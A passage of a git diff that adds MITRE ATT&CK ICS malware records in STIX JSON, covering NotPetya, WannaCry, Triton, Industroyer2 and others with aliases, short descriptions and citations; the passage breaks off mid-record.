"external_id": "S0089" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--5719af9d-6b16-46f9-9b28-fb019541ddbb.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5719af9d-6b16-46f9-9b28-fb019541ddbb.json new file mode 100644 index 0000000000000000000000000000000000000000..9d4391ebad7d61208b580b76e2758238588d6653 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5719af9d-6b16-46f9-9b28-fb019541ddbb.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--338b0e88-c726-4d2f-a965-9c2a20c33495", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:11:21.842Z", + "name": "NotPetya", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "NotPetya", + "ExPetr", + "Diskcoder.C", + "GoldenEye", + "Petrwrap", + "Nyetya" + ], + "type": "malware", + "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0368", + "external_id": "S0368" + }, + { + "source_name": "ExPetr", + "description": "(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "Diskcoder.C", + "description": "(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "GoldenEye", + "description": "(Citation: Talos Nyetya June 2017)" + }, + { + "source_name": "Nyetya", + "description": "(Citation: Talos Nyetya June 2017)" + }, + { + "source_name": "Petrwrap", + "description": "(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "ESET Telebots June 2017", + "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.", + "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/" + }, + { + "source_name": "Talos Nyetya June 2017", + "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", + "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "US-CERT NotPetya 2017", + "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55.json new file mode 100644 index 0000000000000000000000000000000000000000..a317eb44d08a02674ddadba1865661e25b5b6d35 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--a341a1ee-4c32-4452-8182-cfecda94645d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:15:47.458Z", + "name": "Conficker", + "description": "[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Conficker", + "Kido", + "Downadup" + ], + "type": "malware", + "id": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "created": "2021-02-23T20:50:32.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0608", + "external_id": "S0608" + }, + { + "source_name": "Kido", + "description": "(Citation: SANS Conficker) " + }, + { + "source_name": "Downadup", + "description": "(Citation: SANS Conficker) " + }, + { + "source_name": "SANS Conficker", + "description": "Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.", + "url": "https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm" + }, + { + "source_name": "Conficker Nuclear Power Plant", + "description": "Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--5af7a825-2d9f-400d-931a-e00eb9e27f48.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5af7a825-2d9f-400d-931a-e00eb9e27f48.json new file mode 100644 index 0000000000000000000000000000000000000000..b4df20f0ac1ec4592229a35b5995ae4dff143314 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5af7a825-2d9f-400d-931a-e00eb9e27f48.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--afe3e47a-ece5-47f9-bc93-12aaead775c3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:03:50.370Z", + "name": "LockerGoga", + "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_aliases": [ + "LockerGoga" + ], + "type": "malware", + "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "created": "2019-04-16T19:00:49.435Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0372", + "external_id": "S0372" + }, + { + "source_name": "CarbonBlack LockerGoga 2019", + "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware. Retrieved April 16, 2019.", + "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" + }, + { + "source_name": "Unit42 LockerGoga 2019", + "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", + "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--6108f800-10b8-4090-944e-be579f01263d.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6108f800-10b8-4090-944e-be579f01263d.json new file mode 100644 index 0000000000000000000000000000000000000000..129e2de5be5a5bf607bca9cb123400a63eb1b34b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6108f800-10b8-4090-944e-be579f01263d.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--5f28f337-c5fb-4d07-b8aa-2a9f3823035f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T18:30:51.174Z", + "name": "VPNFilter", + "description": "[VPNFilter](https://attack.mitre.org/software/S1010) is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. [VPNFilter](https://attack.mitre.org/software/S1010) modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "VPNFilter" + ], + "type": "malware", + "id": "malware--6108f800-10b8-4090-944e-be579f01263d", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1010", + "external_id": "S1010" + }, + { + "source_name": "Carl Hurd March 2019", + "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ", + "url": "https://www.youtube.com/watch?v=yuZazP22rpI" + }, + { + "source_name": "William Largent June 2018", + "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ", + "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--68dca94f-c11d-421e-9287-7c501108e18c.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--68dca94f-c11d-421e-9287-7c501108e18c.json new file mode 100644 index 0000000000000000000000000000000000000000..decfb5e18f5b4cfc3501dba1d1b53b8be1371721 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--68dca94f-c11d-421e-9287-7c501108e18c.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--7f12df0a-5102-44aa-8043-a9a8036aec17", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:17:50.971Z", + "name": "Duqu", + "description": "[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Duqu" + ], + "type": "malware", + "id": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "created": "2017-05-31T21:32:31.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0038", + "external_id": "S0038" + }, + { + "source_name": "Symantec W32.Duqu", + "description": "Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5.json new file mode 100644 index 0000000000000000000000000000000000000000..ce51b508d54517df8ec5e8409c750b981a2ac0d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--41a14769-749e-4703-8500-0722289392e5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-06T22:00:22.774Z", + "name": "Industroyer2", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Engineering Workstation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Industroyer2" + ], + "type": "malware", + "id": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "created": "2023-03-30T19:20:45.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1072", + "external_id": "S1072" + }, + { + "source_name": "Industroyer2 Blackhat ESET", + "description": "Anton Cherepanov, Robert Lipovsky. (2022, August). Industroyer2: Sandworm's Cyberwarfare Targets Ukraine's Power Grid. Retrieved April 6, 2023.", + "url": "https://www.youtube.com/watch?v=xC9iM5wVedQ" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830.json new file mode 100644 index 0000000000000000000000000000000000000000..d510d0d760ec372b1da14aef4e2714925bb3b40a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--bee3a09c-baf6-42ea-bec5-272d73911192", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Killdisk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Killdisk", + "description": "In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk's main functionality is to overwrite files with random data, rendering the OS unbootable. (Citation: ESET BlackEnergy Jan 2016)", + "id": "malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31T21:33:21.973Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1005", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0016" + }, + { + "source_name": "ESET BlackEnergy Jan 2016", + "description": "Anton Cherepanov. (n.d.). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved October 29, 2019.", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661.json new file mode 100644 index 0000000000000000000000000000000000000000..d0230c5442f371d5f6b35530418e6df1c75a826e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661.json @@ -0,0 +1,92 @@ +{ + "type": "bundle", + "id": "bundle--d7eda39f-af96-4ca3-9037-aab5ba71dbd6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:20:20.868Z", + "name": "WannaCry", + "description": "[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Jan Miller, CrowdStrike" + ], + "x_mitre_aliases": [ + "WannaCry", + "WanaCry", + "WanaCrypt", + "WanaCrypt0r", + "WCry" + ], + "type": "malware", + "id": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "created": "2019-03-25T17:30:17.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0366", + "external_id": "S0366" + }, + { + "source_name": "WanaCrypt0r", + "description": "(Citation: LogRhythm WannaCry)" + }, + { + "source_name": "WCry", + "description": "(Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "WanaCry", + "description": "(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "WanaCrypt", + "description": "(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "FireEye WannaCry 2017", + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + }, + { + "source_name": "SecureWorks WannaCry Analysis", + "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.", + "url": "https://www.secureworks.com/research/wcry-ransomware-analysis" + }, + { + "source_name": "Washington Post WannaCry 2017", + "description": "Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.", + "url": "https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4" + }, + { + "source_name": "LogRhythm WannaCry", + "description": "Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/" + }, + { + "source_name": "US-CERT WannaCry 2017", + "description": "US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-132A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--80099a91-4c86-4bea-9ccb-dac55d61960e.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--80099a91-4c86-4bea-9ccb-dac55d61960e.json new file mode 100644 index 0000000000000000000000000000000000000000..632cbc9d91db8dd74de2805710ada15ef3522c30 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--80099a91-4c86-4bea-9ccb-dac55d61960e.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--721ebd06-b632-4fe2-904f-395830502d99", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-23T14:27:54.711Z", + "name": "Triton", + "description": "[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Triton", + "TRISIS", + "HatMan" + ], + "type": "malware", + "id": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1009", + "external_id": "S1009" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + }, + { + "source_name": "Julian Gutmanis March 2019", + "description": "Julian Gutmanis 2019, March 11 Triton - A Report From The Trenches Retrieved. 2019/03/11 ", + "url": "https://www.youtube.com/watch?v=XwSJ8hloGvY" + }, + { + "source_name": "Schneider December 2018", + "description": "Schneider 2018, December 14 Security Notification EcoStruxure Triconex Tricon V3 Retrieved. 2019/03/08 ", + "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2017-347-01+Triconex+V3.pdf&p_Doc_Ref=SEVD-2017-347-01" + }, + { + "source_name": "Schneider Electric January 2018", + "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ", + "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b.json new file mode 100644 index 0000000000000000000000000000000000000000..d547db3907a19b3e1b5400a1834af47d869c0342 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--9ca9b74d-5977-4d2a-9343-ac25efa69a0d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "BlackEnergy 3" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "BlackEnergy 3", + "description": "[BlackEnergy 3](https://collaborate.mitre.org/attackics/index.php/Software/S0004) is a malware toolkit that has been used by both criminal and APT actors. It support various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid. (Citation: Booz Allen Hamilton)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-04-29T14:49:39.188Z", + "external_references": [ + { + "external_id": "S1002", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0004" + }, + { + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.", + "source_name": "Booz Allen Hamilton", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f.json new file mode 100644 index 0000000000000000000000000000000000000000..85653b615a0eb79e5a9401ad7ef54bc631fdd532 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--5b7fce69-aba4-4114-8305-b96998b2f4e9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_version": "1.0", + "type": "malware", + "modified": "2021-10-21T14:00:00.188Z", + "created": "2021-04-13T12:28:31.188Z", + "description": 